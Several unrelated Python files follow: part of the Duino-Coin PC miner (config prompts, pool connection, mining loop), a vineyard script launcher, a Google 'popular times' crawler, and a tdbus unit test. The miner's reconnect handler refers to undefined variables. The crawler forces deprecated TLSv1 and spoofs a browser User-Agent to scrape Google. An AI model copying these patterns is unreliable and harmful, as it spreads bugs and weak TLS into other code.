+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("fa"):
lang = "farsi"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
prompt = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if prompt == "2":
algorithm = "XXHASH"
intensity = 100 # None
##
# intensity = sub(r"\D", "",
# input(Style.NORMAL
## + get_string("ask_intensity")
# + Style.BRIGHT))
# if not intensity:
## intensity = 95
# elif float(intensity) > 100:
## intensity = 100
# elif float(intensity) < 1:
## intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
except:
pretty_print(get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error', 'net0')
retry_counter += 1
sleep(10)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
reject.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used only to
make the wallets display one miner with many threads
instead of many separate miners clogging it up
(like it was before release 2.7.3)
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 8:
threads = 8
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
script.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import os
import subprocess
import sys
import threading
from .launcher import Launcher, LauncherStatus
logger = logging.getLogger('vineyard')
class ScriptLauncher(Launcher):
''' Launch the job by executing a script.
The output of script must be printed to stdout, rather than stderr.
'''
def __init__(self, script):
super(ScriptLauncher, self).__init__()
self._script = script
self._proc = None
self._listen_out_thrd = None
self._listen_err_thrd = None
self._cmd = None
self._err_message = None
self._exit_code = None
@property
def command(self):
return self._cmd
@property
def error_message(self):
return self._err_message
@property
def exit_code(self):
return self._exit_code
def run(self, *args, **kw):
# FIXME run self._script on a set of host machines, the host is decided
# by the arguments of the launcher in `__init__`, and those inputs object
cmd = [self._script]
for arg in args:
if isinstance(arg, str):
cmd.append(arg.encode('unicode-escape').decode('utf-8'))
else:
cmd.append(repr(arg))
env = os.environ.copy()
for key, value in kw.items():
# if key is all in lower cases, treat it as arguments, otherwise as the
# environment variables.
if key.islower():
cmd.append('--%s' % key)
if isinstance(value, str):
cmd.append(value)
else:
cmd.append(repr(value))
else:
env[key] = value
logger.debug('command = %s', ' '.join(cmd))
self._cmd = cmd
self._proc = subprocess.Popen(cmd,
env=env,
universal_newlines=True,
encoding='utf-8',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self._status = LauncherStatus.RUNNING
self._listen_out_thrd = threading.Thread(target=self.read_output, args=(self._proc.stdout, ))
self._listen_out_thrd.daemon = True
self._listen_out_thrd.start()
self._err_message = []
self._listen_err_thrd = threading.Thread(target=self.read_err, args=(self._proc.stderr, ))
self._listen_err_thrd.daemon = True
self._listen_err_thrd.start()
def wait(self, timeout=None):
# a fast wait: to use existing response directly, since the io adaptor may finish immediately.
r = super(ScriptLauncher, self).wait(timeout=0)
if r is not None:
return r
elapsed, period = 0, 1
while self._proc.poll() is None:
if timeout is not None and elapsed > timeout:
raise TimeoutError('Unable to wait for status of job [%s] after %r seconds' % (self._cmd, timeout))
r = super(ScriptLauncher, self).wait(timeout=period)
elapsed += period
if r is None:
continue
else:
return r
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
remaining = self._proc.stdout.read()
if remaining:
for line in remaining.split('\n'):
self.parse(line)
r = super(ScriptLauncher, self).wait(timeout=period)
if r is not None:
return r
raise RuntimeError('Failed to launch job [%s], exited with %r: %s' %
(self._cmd, self._proc.poll(), ''.join(self._err_message)))
def read_output(self, stdout):
while self._proc.poll() is None:
line = stdout.readline()
if line:
self.parse(line)
logger.debug(line)
# consume all extra lines if the proc exits.
for line in stdout.readlines():
self.parse(line)
logger.debug(line)
def read_err(self, stderr):
while self._proc.poll() is None:
line = stderr.readline()
if line:
self._err_message.append(line)
self._err_message.extend(stderr.readlines())
def join(self):
self._exit_code = self._proc.wait()
if self._exit_code != 0:
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
# makes the listen thread exits.
self._listen_out_thrd.join()
self._listen_err_thrd.join()
def dispose(self, desired=True):
if self._status == LauncherStatus.RUNNING:
try:
self._proc.terminate()
except ProcessLookupError:
pass
if desired:
self._status = LauncherStatus.FAILED
else:
self._status = LauncherStatus.SUCCEED
return self._status
|
crawler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import calendar
import datetime
import json
import logging
import math
import re
import ssl
import threading
import urllib.parse
import urllib.request
from queue import Queue
from time import sleep, time
import requests
from geopy import Point
from geopy.distance import geodesic, GeodesicDistance
# urls for google api web service
BASE_URL = "https://maps.googleapis.com/maps/api/place/"
RADAR_URL = BASE_URL + "radarsearch/json?location={},{}&radius={}&types={}&key={}"
NEARBY_URL = BASE_URL + "nearbysearch/json?location={},{}&radius={}&types={}&key={}"
DETAIL_URL = BASE_URL + "details/json?placeid={}&key={}"
# user agent for populartimes request
USER_AGENT = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/54.0.2840.98 Safari/537.36"}
class PopulartimesException(Exception):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error
"""
def __init__(self, expression, message):
self.expression = expression
self.message = message
def rect_circle_collision(rect_left, rect_right, rect_bottom, rect_top, circle_x, circle_y, radius):
# returns true iff circle intersects rectangle
def clamp(val, min, max):
# limits value to the range min..max
if val < min:
return min
if val > max:
return max
return val
# Find the closest point to the circle within the rectangle
closest_x = clamp(circle_x, rect_left, rect_right)
closest_y = clamp(circle_y, rect_bottom, rect_top)
# Calculate the distance between the circle's center and this closest point
dist_x = circle_x - closest_x
dist_y = circle_y - closest_y
# If the distance is less than the circle's radius, an intersection occurs
dist_sq = (dist_x * dist_x) + (dist_y * dist_y)
return dist_sq < (radius * radius)
def cover_rect_with_cicles(w, h, r):
"""
fully cover a rectangle of given width and height with
circles of radius r. This algorithm uses a hexagonal
honeycomb pattern to cover the area.
:param w: width of rectangle
:param h: height of reclangle
:param r: radius of circles
:return: list of circle centers (x,y)
"""
# initialize result list
res = []
# horizontal distance between circle centers
x_dist = math.sqrt(3) * r
# vertical distance between circle centers
y_dist = 1.5 * r
# number of circles per row (different for even/odd rows)
cnt_x_even = math.ceil(w / x_dist)
cnt_x_odd = math.ceil((w - x_dist / 2) / x_dist) + 1
# number of rows
cnt_y = math.ceil((h - r) / y_dist) + 1
y_offs = 0.5 * r
for y in range(cnt_y):
if y % 2 == 0:
# shift even rows to the right
x_offs = x_dist / 2
cnt_x = cnt_x_even
else:
x_offs = 0
cnt_x = cnt_x_odd
for x in range(cnt_x):
res.append((x_offs + x * x_dist, y_offs + y * y_dist))
# top-right circle is not always required
if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):
res = res[0:-1]
return res
def get_circle_centers(b1, b2, radius):
"""
the function covers the area within the bounds with circles
:param b1: south-west bounds [lat, lng]
:param b2: north-east bounds [lat, lng]
:param radius: specified radius, adapt for high density areas
:return: list of circle centers that cover the area between lower/upper
"""
sw = Point(b1)
ne = Point(b2)
# north/east distances
dist_lat = geodesic(Point(sw[0], sw[1]), Point(ne[0], sw[1])).meters
dist_lng = geodesic(Point(sw[0], sw[1]), Point(sw[0], ne[1])).meters
circles = cover_rect_with_cicles(dist_lat, dist_lng, radius)
cords = [
GeodesicDistance(meters=c[0])
.destination(
GeodesicDistance(meters=c[1])
.destination(point=sw, bearing=90),
bearing=0
)[:2]
for c in circles
]
return cords
def worker_radar():
"""
worker that gets coordinates of queue and starts radar search
:return:
"""
while True:
item = q_radar.get()
get_radar(item)
q_radar.task_done()
def get_radar(item):
_lat, _lng = item["pos"]
# places - nearby search
# https://developers.google.com/places/web-service/search?hl=en#PlaceSearchRequests
radar_str = NEARBY_URL.format(
_lat, _lng, params["radius"], "|".join(params["type"]), params["API_key"]
)
# is this a next page request?
if item["res"] > 0:
# possibly wait remaining time until next_page_token becomes valid
min_wait = 2 # wait at least 2 seconds before the next page request
sec_passed = time() - item["last_req"]
if sec_passed < min_wait:
sleep(min_wait - sec_passed)
radar_str += "&pagetoken=" + item["next_page_token"]
resp = json.loads(requests.get(radar_str, auth=('user', 'pass')).text)
check_response_code(resp)
radar = resp["results"]
item["res"] += len(radar)
if item["res"] >= 60:
logging.warning("Result limit in search radius reached, some data may get lost")
bounds = params["bounds"]
# retrieve google ids for detail search
for place in radar:
geo = place["geometry"]["location"]
if bounds["lower"]["lat"] <= geo["lat"] <= bounds["upper"]["lat"] \
and bounds["lower"]["lng"] <= geo["lng"] <= bounds["upper"]["lng"]:
# this isn't thread safe, but we don't really care,
# since in worst case a set entry is simply overwritten
g_places[place["place_id"]] = place
# if there are more results, schedule next page requests
if "next_page_token" in resp:
item["next_page_token"] = resp["next_page_token"]
item["last_req"] = time()
q_radar.put(item)
def worker_detail():
"""
worker that gets item of queue and starts detailed data retrieval
:return:
"""
while True:
item = q_detail.get()
get_detail(item)
q_detail.task_done()
def get_popularity_for_day(popularity):
"""
Returns popularity for day
:param popularity:
:return:
"""
# Initialize empty matrix with 0s
pop_json = [[0 for _ in range(24)] for _ in range(7)]
wait_json = [[0 for _ in range(24)] for _ in range(7)]
for day in popularity:
day_no, pop_times = day[:2]
if pop_times:
for hour_info in pop_times:
hour = hour_info[0]
pop_json[day_no - 1][hour] = hour_info[1]
# check if the waiting string is available and convert no minutes
if len(hour_info) > 5:
wait_digits = re.findall(r'\d+', hour_info[3])
if len(wait_digits) == 0:
wait_json[day_no - 1][hour] = 0
elif "min" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0])
elif "hour" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60
else:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 + int(wait_digits[1])
# day wrap
if hour_info[0] == 23:
day_no = day_no % 7 + 1
ret_popularity = [
{
"name": list(calendar.day_name)[d],
"data": pop_json[d]
} for d in range(7)
]
# waiting time only if applicable
ret_wait = [
{
"name": list(calendar.day_name)[d],
"data": wait_json[d]
} for d in range(7)
] if any(any(day) for day in wait_json) else []
# {"name" : "monday", "data": [...]} for each weekday as list
return ret_popularity, ret_wait
def index_get(array, *argv):
"""
checks if a index is available in the array and returns it
:param array: the data array
:param argv: index integers
:return: None if not available or the return value
"""
try:
for index in argv:
array = array[index]
return array
# there is either no info available or no popular times
# TypeError: rating/rating_n/populartimes wrong of not available
except (IndexError, TypeError):
return None
def add_optional_parameters(detail_json, detail, rating, rating_n, popularity, current_popularity, time_spent):
"""
check for optional return parameters and add them to the result json
:param detail_json:
:param detail:
:param rating:
:param rating_n:
:param popularity:
:param current_popularity:
:param time_spent:
:return:
"""
if rating:
detail_json["rating"] = rating
elif "rating" in detail:
detail_json["rating"] = detail["rating"]
if rating_n:
detail_json["rating_n"] = rating_n
if "international_phone_number" in detail:
detail_json["international_phone_number"] = detail["international_phone_number"]
if current_popularity:
detail_json["current_popularity"] = current_popularity
if popularity:
popularity, wait_times = get_popularity_for_day(popularity)
detail_json["populartimes"] = popularity
if wait_times:
detail_json["time_wait"] = wait_times
if time_spent:
detail_json["time_spent"] = time_spent
return detail_json
def get_populartimes_from_search(name, address):
"""
request information for a place and parse current popularity
:param name: name string
:param address: address string for checking if numbered address
:return:
"""
place_identifier = "{} {}".format(name, address)
params_url = {
"tbm": "map",
"tch": 1,
"hl": "en",
"q": urllib.parse.quote_plus(place_identifier),
"pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
"!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
"!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
"1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
"10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
"qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
"25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
"1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
"!3b1"
}
search_url = "https://www.google.de/search?" + "&".join(k + "=" + str(v) for k, v in params_url.items())
logging.info("searchterm: " + search_url)
# noinspection PyUnresolvedReferences
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
resp = urllib.request.urlopen(urllib.request.Request(url=search_url, data=None, headers=USER_AGENT),
context=gcontext)
data = resp.read().decode('utf-8').split('/*""*/')[0]
# find eof json
jend = data.rfind("}")
if jend >= 0:
data = data[:jend + 1]
jdata = json.loads(data)["d"]
jdata = json.loads(jdata[4:])
# check if proper and numeric address, i.e. multiple components and street number
is_proper_address = any(char.isspace() for char in address.strip()) and any(char.isdigit() for char in address)
info = index_get(jdata, 0, 1, 0 if is_proper_address else 1, 14)
rating = index_get(info, 4, 7)
rating_n = index_get(info, 4, 8)
popular_times = index_get(info, 84, 0)
# current_popularity is also not available if popular_times isn't
current_popularity = index_get(info, 84, 7, 1)
time_spent = index_get(info, 117, 0)
# extract wait times and convert to minutes
if time_spent:
nums = [float(f) for f in re.findall(r'\d*\.\d+|\d+', time_spent.replace(",", "."))]
contains_min, contains_hour = "min" in time_spent, "hour" in time_spent or "hr" in time_spent
time_spent = None
if contains_min and contains_hour:
time_spent = [nums[0], nums[1] * 60]
elif contains_hour:
time_spent = [nums[0] * 60, (nums[0] if len(nums) == 1 else nums[1]) * 60]
elif contains_min:
time_spent = [nums[0], nums[0] if len(nums) == 1 else nums[1]]
time_spent = [int(t) for t in time_spent]
return rating, rating_n, popular_times, current_popularity, time_spent
def get_detail(place_id):
"""
loads data for a given area
:return:
"""
global results
# detail_json = get_populartimes(params["API_key"], place_id)
detail_json = get_populartimes_by_detail(params["API_key"], g_places[place_id])
if params["all_places"] or "populartimes" in detail_json:
results.append(detail_json)
def get_populartimes(api_key, place_id):
"""
sends request to detail to get a search string
and uses standard proto buffer to get additional information
on the current status of popular times
:return: json details
"""
# places api - detail search
# https://developers.google.com/places/web-service/details?hl=de
detail_str = DETAIL_URL.format(place_id, api_key)
resp = json.loads(requests.get(detail_str, auth=('user', 'pass')).text)
check_response_code(resp)
detail = resp["result"]
return get_populartimes_by_detail(api_key, detail)
def get_populartimes_by_detail(api_key, detail):
address = detail["formatted_address"] if "formatted_address" in detail else detail.get("vicinity", "")
detail_json = {
"id": detail["place_id"],
"name": detail["name"],
"address": address,
"types": detail["types"],
"coordinates": detail["geometry"]["location"]
}
detail_json = add_optional_parameters(detail_json, detail, *get_populartimes_from_search(
detail["name"], address
))
return detail_json
def check_response_code(resp):
"""
check if query quota has been surpassed or other errors occured
:param resp: json response
:return:
"""
if resp["status"] == "OK" or resp["status"] == "ZERO_RESULTS":
return
if resp["status"] == "REQUEST_DENIED":
raise PopulartimesException("Google Places " + resp["status"],
"Request was denied, the API key is invalid.")
if resp["status"] == "OVER_QUERY_LIMIT":
raise PopulartimesException("Google Places " + resp["status"],
"You exceeded your Query Limit for Google Places API Web Service, "
"check https://developers.google.com/places/web-service/usage "
"to upgrade your quota.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "NOT_FOUND":
raise PopulartimesException("Google Places " + resp["status"],
"The place ID was not found and either does not exist or was retired.")
raise PopulartimesException("Google Places " + resp["status"],
"Unidentified error with the Places API, please check the response code")
def run(_params):
"""
wrap execution logic in method, for later external call
:return:
"""
global params, g_places, q_radar, q_detail, results
start = datetime.datetime.now()
# shared variables
params = _params
q_radar, q_detail = Queue(), Queue()
g_places, results = dict(), list()
logging.info("Adding places to queue...")
# threading for radar search
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_radar)
t.daemon = True
t.start()
# cover search area with circles
bounds = params["bounds"]
for lat, lng in get_circle_centers([bounds["lower"]["lat"], bounds["lower"]["lng"]], # southwest
[bounds["upper"]["lat"], bounds["upper"]["lng"]], # northeast
params["radius"]):
q_radar.put(dict(pos=(lat, lng), res=0))
q_radar.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
logging.info("{} places to process...".format(len(g_places)))
# threading for detail search and popular times
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_detail)
t.daemon = True
t.start()
for g_place_id in g_places:
q_detail.put(g_place_id)
q_detail.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
return results
|
test_message.py
|
#
# This file is part of python-tdbus. Python-tdbus is free software
# available under the terms of the MIT license. See the file "LICENSE" that
# was provided together with this source file for the licensing terms.
#
# Copyright (c) 2012 the python-tdbus authors. See the file "AUTHORS" for a
# complete list.
import logging
import math
from threading import Thread
import unittest
import gevent
from tdbus import GEventDBusConnection, DBUS_BUS_SESSION, DBusError, \
SimpleDBusConnection, method, DBusHandler
from tdbus.handler import signal_handler, dbus_object
from .base import BaseTest
logging.basicConfig()
IFACE_EXAMPLE = 'com.example'
class MessageTest(BaseTest):
def echo(self, signature=None, args=None):
reply = self.client.call_method('/', 'Echo', IFACE_EXAMPLE, signature, args,
destination=self.server_name, timeout=10)
return reply.get_args()
def echo_exception(self, signature=None, args=None):
try:
self.client.call_method('/', 'EchoException', IFACE_EXAMPLE, signature, args,
destination=self.server_name, timeout=10)
except DBusError as e:
return e
else:
raise ValueError("Should have gotten an DbusError")
def test_arg_byte(self):
assert self.echo('y', (0,)) == (0,)
assert self.echo('y', (10,)) == (10,)
assert self.echo('y', (0xff,)) == (0xff,)
def test_arg_byte_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('y', (-1,))
self.echo('y', (0x100,))
def test_arg_int16(self):
assert self.echo('n', (-0x8000,)) == (-0x8000,)
assert self.echo('n', (-10,)) == (-10,)
assert self.echo('n', (-0,)) == (-0,)
assert self.echo('n', (10,)) == (10,)
assert self.echo('n', (0x7fff,)) == (0x7fff,)
def test_arg_int16_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('n', (-0x8001,))
self.echo('n', (0x8000,))
def test_arg_uint16(self):
assert self.echo('q', (0,)) == (0,)
assert self.echo('q', (10,)) == (10,)
assert self.echo('q', (0xffff,)) == (0xffff,)
def test_arg_uint16_out_of_range(self):
with self.assertRaises(DBusError):
self.echo('q', (-1,))
self.echo('q', (0x10000,))
def test_arg_int32(self):
assert self.echo('i', (-0x80000000,)) == (-0x80000000,)
assert self.echo('i', (-10,)) == (-10,)
